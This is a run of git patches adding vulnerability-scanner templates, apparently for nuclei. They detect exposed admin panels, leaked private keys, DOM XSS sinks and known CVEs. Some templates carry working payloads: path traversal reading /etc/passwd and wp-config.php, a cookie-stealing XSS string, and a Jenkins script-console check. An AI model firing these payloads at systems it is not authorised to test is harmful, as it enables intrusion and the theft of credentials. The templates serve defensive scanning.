<466878+geeknik@users.noreply.github.com> Date: Tue, 27 Jul 2021 14:26:04 -0500 Subject: [PATCH 035/478] Update private-key.yaml --- file/keys/private-key.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml index 7149e7400e..3e779effd4 100644 --- a/file/keys/private-key.yaml +++ b/file/keys/private-key.yaml @@ -2,7 +2,7 @@ id: private-key info: name: Private Key Detect - author: gaurang + author: gaurang,geeknik severity: high tags: token,file @@ -19,4 +19,6 @@ file: - "\"BEGIN DSA PRIVATE KEY\"" - "\"BEGIN EC PRIVATE KEY\"" - "\"BEGIN PGP PRIVATE KEY BLOCK\"" - - "\"ssh-rsa\"" \ No newline at end of file + - "\"ssh-rsa\"" + - "\"ssh-dsa\"" + - "\"ssh-ed25519\"" From 0341b58077e16c1349fa24c4043bf09627139b77 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 28 Jul 2021 05:02:29 +0700 Subject: [PATCH 036/478] Create CVE-2009-5114.yaml --- cves/2009/CVE-2009-5114.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2009/CVE-2009-5114.yaml diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml new file mode 100644 index 0000000000..557037e9ed --- /dev/null +++ b/cves/2009/CVE-2009-5114.yaml @@ -0,0 +1,27 @@ +id: CVE-2009-5114 + +info: + name: WebGlimpse 2.18.7 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + reference: | + - https://www.exploit-db.com/exploits/36994 + - https://www.cvedetails.com/cve/CVE-2009-5114 + tags: cve,cve2009,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a07d931799caca3d06e6517bce0aefed303ba8c0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 28 Jul 2021 05:03:23 +0700 Subject: [PATCH 037/478] Create CVE-2014-8799.yaml --- cves/2014/CVE-2014-8799.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2014/CVE-2014-8799.yaml diff --git a/cves/2014/CVE-2014-8799.yaml b/cves/2014/CVE-2014-8799.yaml new file mode 100644 index 0000000000..6898342c4e --- /dev/null +++ b/cves/2014/CVE-2014-8799.yaml @@ -0,0 +1,29 @@ +id: CVE-2014-8799 + +info: + name: WordPress Plugin DukaPress 2.5.2 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the dp_img_resize function in php/dp-functions.php in the DukaPress plugin before 2.5.4 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter to lib/dp_image.php. + reference: | + - https://www.exploit-db.com/exploits/35346 + - https://www.cvedetails.com/cve/CVE-2014-8799 + tags: cve,cve2014,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 2bc6cc018f920e1ef99b90706ec91fa1f1900e72 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:13:33 +0700 Subject: [PATCH 038/478] Create CVE-2011-4336.yaml --- cves/2011/CVE-2011-4336.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2011/CVE-2011-4336.yaml diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml new file mode 100644 index 0000000000..728e971575 --- /dev/null +++ b/cves/2011/CVE-2011-4336.yaml @@ -0,0 +1,33 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2016,xss,tiki-wiki + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html From 8c9697cb2f1d2e0edfff1dbfd8c1663cdc3b57c8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:19:43 +0700 Subject: [PATCH 039/478] Update CVE-2011-4336.yaml --- cves/2011/CVE-2011-4336.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 728e971575..0932d1bd99 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: medium description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. - reference: + reference: | - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 From 19a29bf7543cdf2951d2fae46be39e0276ab2b96 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Tue, 27 Jul 2021 20:32:43 -0400 Subject: [PATCH 040/478] Create getsimple-cms-detector.yaml Test ``` nuclei -t getsimple-cms-detector.yaml -u http://www.lrc.ic.unicamp.br/~luisrussi nuclei -t getsimple-cms-detector.yaml -u https://hebergement-pro.com/ ``` --- technologies/getsimple-cms-detector.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 technologies/getsimple-cms-detector.yaml diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml new file mode 100644 index 0000000000..e2fda51c52 --- /dev/null +++ b/technologies/getsimple-cms-detector.yaml @@ -0,0 +1,20 @@ +info: + name: GetSimple CMS Detector + author: philippedelteil + severity: info + description: With this template we can detect a running GetSimple CMS instance + tags: getsimple +requests: + - method: GET + path: + - "{{BaseURL}}/readme.txt" + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'GetSimple CMS is a flatfile CMS' + - type: status + part: header + status: + - 200 From 38e095c98c9ac8371e2ec890987841223e97a577 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 28 Jul 2021 07:38:20 +0700 Subject: [PATCH 041/478] Fix Tags --- cves/2011/CVE-2011-4336.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2011/CVE-2011-4336.yaml b/cves/2011/CVE-2011-4336.yaml index 0932d1bd99..a6e4e66f47 100644 --- a/cves/2011/CVE-2011-4336.yaml +++ b/cves/2011/CVE-2011-4336.yaml @@ -9,7 +9,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - https://www.securityfocus.com/bid/48806/info - https://seclists.org/bugtraq/2011/Nov/140 - tags: cve,cve2016,xss,tiki-wiki + tags: cve,cve2011,xss,tiki-wiki requests: - method: GET From 7038617c863a7f75f157cff5acbedcebcf687246 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 28 Jul 2021 23:56:51 +0530 Subject: [PATCH 042/478] Add files via upload --- vulnerabilities/wordpress/wp-upload-data.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-upload-data.yaml diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml new file mode 100644 index 0000000000..4aa9d5beed --- /dev/null +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -0,0 +1,21 @@ +id: wordpress-upload-data +info: + name: wordpress-upload-data + author: pussycat0x + severity: medium + description: Searches for Passwords in the wordpress uploads directory. + reference: https://www.exploit-db.com/ghdb/7040 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/data.txt" + matchers-condition: and + matchers: + - type: word + words: + - "admin" + - "" + - type: status + status: + - 200 \ No newline at end of file From 576b42b4120208b54e1eb231a76a8d41ae5ff926 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 00:09:11 +0530 Subject: [PATCH 043/478] Update wp-upload-data.yaml --- vulnerabilities/wordpress/wp-upload-data.yaml | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml index 4aa9d5beed..1249e1431c 100644 --- a/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -10,12 +10,18 @@ requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/data.txt" + matchers-condition: and matchers: - type: word words: - "admin" - - "" + + - type: word + part: header + words: + - text/plain + - type: status status: - - 200 \ No newline at end of file + - 200 From 58d7691435f05e31696a9598dea90a7622fc50be Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 28 Jul 2021 13:49:30 -0500 Subject: [PATCH 044/478] Create dom-xss.yaml --- file/xss/dom-xss.yaml | 46 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 file/xss/dom-xss.yaml diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml new file mode 100644 index 0000000000..e5fa919c30 --- /dev/null +++ b/file/xss/dom-xss.yaml @@ -0,0 +1,46 @@ +id: dom-xss + +info: + name: DOM XSS Sources & Sinks + reference: Inspired by https://portswigger.net/blog/introducing-dom-invader + # The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report. + author: geeknik + severity: info + tags: dom,xss,file + +file: + - extensions: + - js + - ts + - html + - php + - cs + - rb + - py + + extractors: + - type: regex + name: sink + part: body + regex: + - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' + - 'fetch(\.body)?' + - 'history(\.pushState|\.replaceState)' + - '(session|local)Storage(\.setItem(\.name|\.value))' + - 'anchor(\.href|\.target)' + - 'button(\.formaction|\.value)' + - 'set(Timeout|Interval|Immediate)' + - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' + - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' + - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' + - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' + - 'iframe(\.srcdoc|\.src)' + - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex + name: source + part: body + regex: + - 'location(\.href|\.hash|\.search|\.pathname)?' + - 'window\.name' + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' From 5a9656535721034c211a6658e2f6365927616b48 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 28 Jul 2021 13:51:10 -0500 Subject: [PATCH 045/478] Update dom-xss.yaml typo fix --- file/xss/dom-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index e5fa919c30..52613af665 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -23,7 +23,7 @@ file: name: sink part: body regex: - - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' - 'fetch(\.body)?' - 'history(\.pushState|\.replaceState)' From 33e66010a7a365e26c1d54b5bad4ad3f6eab600e Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 14:45:05 +0800 Subject: [PATCH 046/478] Create test --- test | 1 + 1 file changed, 1 insertion(+) create mode 100644 test diff --git a/test b/test new file mode 100644 index 0000000000..3716bac871 --- /dev/null +++ b/test @@ -0,0 +1 @@ +dsjjdsd From 1f6a6a87640e457d55ff075063de0ade57fd7f8b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 29 Jul 2021 02:50:35 -0400 Subject: [PATCH 047/478] Update jenkins-stack-trace.yaml file name = template id. --- vulnerabilities/jenkins/jenkins-stack-trace.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 91d022d54e..8941ffc298 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -1,4 +1,4 @@ -id: jenkins-stack-traces +id: jenkins-stack-trace info: name: Detect Jenkins in Debug Mode with Stack Traces Enabled From 8a7854719d7a63dbd36495537db96805923d1b35 Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 15:09:54 +0800 Subject: [PATCH 048/478] Create cerebro-page.yaml a new template --- cerebro-page.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cerebro-page.yaml diff --git a/cerebro-page.yaml b/cerebro-page.yaml new file mode 100644 index 0000000000..2d6620a58d --- /dev/null +++ b/cerebro-page.yaml @@ -0,0 +1,19 @@ +id: cerebro-page + +info: + name: cerebro Unauth + author: elder tao + severity: high + reference: https://github.com/lmenezes/cerebro + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/cerebro/" + matchers: + - type: word + words: + - "cerebro" + condition: and + part: body From a8972225fd9e5cfe5f0b41d4d8adc23d6992cc5a Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 15:17:40 +0800 Subject: [PATCH 049/478] Delete test --- test | 1 - 1 file changed, 1 deletion(-) delete mode 100644 test diff --git a/test b/test deleted file mode 100644 index 3716bac871..0000000000 --- a/test +++ /dev/null @@ -1 +0,0 @@ -dsjjdsd From b16af3c06c5a96123b2dbde611bafe31b40e0f8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:08:08 +0530 Subject: [PATCH 050/478] Update cerebro-page.yaml --- cerebro-page.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cerebro-page.yaml b/cerebro-page.yaml index 2d6620a58d..21f2c6fdd8 100644 --- a/cerebro-page.yaml +++ b/cerebro-page.yaml @@ -10,10 +10,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/cerebro/" + - "{{BaseURL}}/login" + matchers: - type: word words: - - "cerebro" - condition: and + - "Cerebro" part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([a-z0-9.]+)" From 108d0224b954051855bd65bd0224f0591fab4a9b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:16:02 +0530 Subject: [PATCH 051/478] Update and rename cerebro-page.yaml to exposed-panels/cerebro-panel.yaml --- cerebro-page.yaml => exposed-panels/cerebro-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cerebro-page.yaml => exposed-panels/cerebro-panel.yaml (85%) diff --git a/cerebro-page.yaml b/exposed-panels/cerebro-panel.yaml similarity index 85% rename from cerebro-page.yaml rename to exposed-panels/cerebro-panel.yaml index 21f2c6fdd8..2d58e845ad 100644 --- a/cerebro-page.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -1,11 +1,11 @@ -id: cerebro-page +id: cerebro-panel info: - name: cerebro Unauth + name: Cerebro Panel author: elder tao severity: high reference: https://github.com/lmenezes/cerebro - tags: config,exposure + tags: panel,cerebro requests: - method: GET From 41c69ccee8189363f64a61aaebfeda2585dec059 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:16:30 +0530 Subject: [PATCH 052/478] Update cerebro-panel.yaml --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 2d58e845ad..3e4a438539 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -1,4 +1,4 @@ -id: cerebro-panel +id: cerebro-panel info: name: Cerebro Panel From 3916bcff9ccb3b4384f3e24955e26597da06cd27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:28:06 +0530 Subject: [PATCH 053/478] Update getsimple-cms-detector.yaml --- technologies/getsimple-cms-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml index e2fda51c52..4fe0fa1917 100644 --- a/technologies/getsimple-cms-detector.yaml +++ b/technologies/getsimple-cms-detector.yaml @@ -3,7 +3,7 @@ info: author: philippedelteil severity: info description: With this template we can detect a running GetSimple CMS instance - tags: getsimple + tags: getsimple,tech requests: - method: GET path: From 8da48bbea8a7ac1b6718834a1614e8d404e51b43 Mon Sep 17 00:00:00 2001 From: Nicolas Mattiocco Date: Thu, 29 Jul 2021 15:17:15 +0200 Subject: [PATCH 054/478] Update git-config.yaml improvement suggestion to keep it simple and flexible --- exposures/configs/git-config.yaml | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 9f030f2ce7..919106075f 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -8,16 +8,9 @@ info: tags: config,git,exposure requests: - - raw: - - | - GET /.git/config HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Content-Length: 1 - Connection: close + - method: GET + path: + - "{{BaseURL}}/.git/config" matchers-condition: and matchers: @@ -33,4 +26,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From f78a51fa18bfb0ea1dd16fefd13361855d58ed3b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 18:56:51 +0530 Subject: [PATCH 055/478] Create glpi-authentication.yaml --- exposed-panels/glpi-authentication.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/glpi-authentication.yaml diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml new file mode 100644 index 0000000000..492a0df24e --- /dev/null +++ b/exposed-panels/glpi-authentication.yaml @@ -0,0 +1,24 @@ +id: glpi-authentication + +info: + name: GLPI - Authentification + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22 + tags: panel,auth + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'GLPI - Authentication' + - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright' + + - type: status + status: + - 200 From 210a2d71467292795914f8e333ca00e617869e52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:00:34 +0530 Subject: [PATCH 056/478] Create gxd5-pacs-connexion-utilisateur.yaml --- .../gxd5-pacs-connexion-utilisateur.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/gxd5-pacs-connexion-utilisateur.yaml diff --git a/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml new file mode 100644 index 0000000000..c4cb4ac680 --- /dev/null +++ b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml @@ -0,0 +1,23 @@ +id: gxd5-pacs-connexion-utilisateur + +info: + name: GXD5 Pacs Connexion utilisateur + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22 + tags: panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'GXD5 Pacs Connexion utilisateur' + + - type: status + status: + - 200 From 90412c464b18d40600a026636ceaef0b6d0260e5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:06:43 +0530 Subject: [PATCH 057/478] Create viewpoint-system-status.yaml --- exposed-panels/viewpoint-system-status.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/viewpoint-system-status.yaml diff --git a/exposed-panels/viewpoint-system-status.yaml b/exposed-panels/viewpoint-system-status.yaml new file mode 100644 index 0000000000..326fa9876c --- /dev/null +++ b/exposed-panels/viewpoint-system-status.yaml @@ -0,0 +1,23 @@ +id: viewpoint-system-status + +info: + name: ViewPoint System Status + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 + tags: status,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ViewPoint System Status' + + - type: status + status: + - 200 From 68b19be9536a0a77a8bac712f0eca824d4ce7d8c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:07:29 +0530 Subject: [PATCH 058/478] Delete viewpoint-system-status.yaml --- exposed-panels/viewpoint-system-status.yaml | 23 --------------------- 1 file changed, 23 deletions(-) delete mode 100644 exposed-panels/viewpoint-system-status.yaml diff --git a/exposed-panels/viewpoint-system-status.yaml b/exposed-panels/viewpoint-system-status.yaml deleted file mode 100644 index 326fa9876c..0000000000 --- a/exposed-panels/viewpoint-system-status.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: viewpoint-system-status - -info: - name: ViewPoint System Status - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 - tags: status,exposures - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'ViewPoint System Status' - - - type: status - status: - - 200 From c8e11b82545cf498de69ed09b1cc59a1851a236c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:08:40 +0530 Subject: [PATCH 059/478] Create viewpoint-system-status.yaml --- misconfiguration/viewpoint-system-status.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 misconfiguration/viewpoint-system-status.yaml diff --git a/misconfiguration/viewpoint-system-status.yaml b/misconfiguration/viewpoint-system-status.yaml new file mode 100644 index 0000000000..326fa9876c --- /dev/null +++ b/misconfiguration/viewpoint-system-status.yaml @@ -0,0 +1,23 @@ +id: viewpoint-system-status + +info: + name: ViewPoint System Status + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 + tags: status,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ViewPoint System Status' + + - type: status + status: + - 200 From 1f10c5b867dd7c7186a7f23adb5dede73d7c1d6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:12:08 +0530 Subject: [PATCH 060/478] Create f-secure-policy-manager.yaml --- exposed-panels/f-secure-policy-manager.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/f-secure-policy-manager.yaml diff --git a/exposed-panels/f-secure-policy-manager.yaml b/exposed-panels/f-secure-policy-manager.yaml new file mode 100644 index 0000000000..52a841605a --- /dev/null +++ b/exposed-panels/f-secure-policy-manager.yaml @@ -0,0 +1,23 @@ +id: f-secure-policy-manager + +info: + name: F-Secure Policy Manager Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22 + tags: login,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'F-Secure Policy Manager Server' + + - type: status + status: + - 200 From 07f2647e1f7cfb10a66d36ee1eee3149da10dfd4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:15:34 +0530 Subject: [PATCH 061/478] Create operations-automation-default-page.yaml --- .../operations-automation-default-page.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/operations-automation-default-page.yaml diff --git a/technologies/operations-automation-default-page.yaml b/technologies/operations-automation-default-page.yaml new file mode 100644 index 0000000000..1a53b9bd61 --- /dev/null +++ b/technologies/operations-automation-default-page.yaml @@ -0,0 +1,23 @@ +id: operations-automation-default-page + +info: + name: Operations Automation Default Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22 + tags: tech,default + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Operations Automation Default Page' + + - type: status + status: + - 200 From 147ac0143acda410958dbd63fc1b0d22e7e55791 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 29 Jul 2021 12:29:05 -0400 Subject: [PATCH 062/478] Create jenkins-script.yaml --- vulnerabilities/jenkins/jenkins-script.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 vulnerabilities/jenkins/jenkins-script.yaml diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml new file mode 100644 index 0000000000..2e6b0f1256 --- /dev/null +++ b/vulnerabilities/jenkins/jenkins-script.yaml @@ -0,0 +1,21 @@ +id: jenkins-script + +info: + name: Jenkins RCE due to accesible script functionality + author: philippedelteil + severity: critical + reference: https://hackerone.com/reports/403402 + tags: jenkins,rce +requests: + - method: GET + path: + - "{{BaseURL}}/script/" + matchers-condition: and + matchers: + - type: word + words: + - "println(Jenkins.instance.pluginManager.plugins)" + part: body + - type: status + status: + - 200 From 4479539a0eca55afb937a00e337aee2aefc038b4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 23:02:10 +0530 Subject: [PATCH 063/478] Update cerebro-panel.yaml --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 3e4a438539..9e315b83e2 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -2,7 +2,7 @@ id: 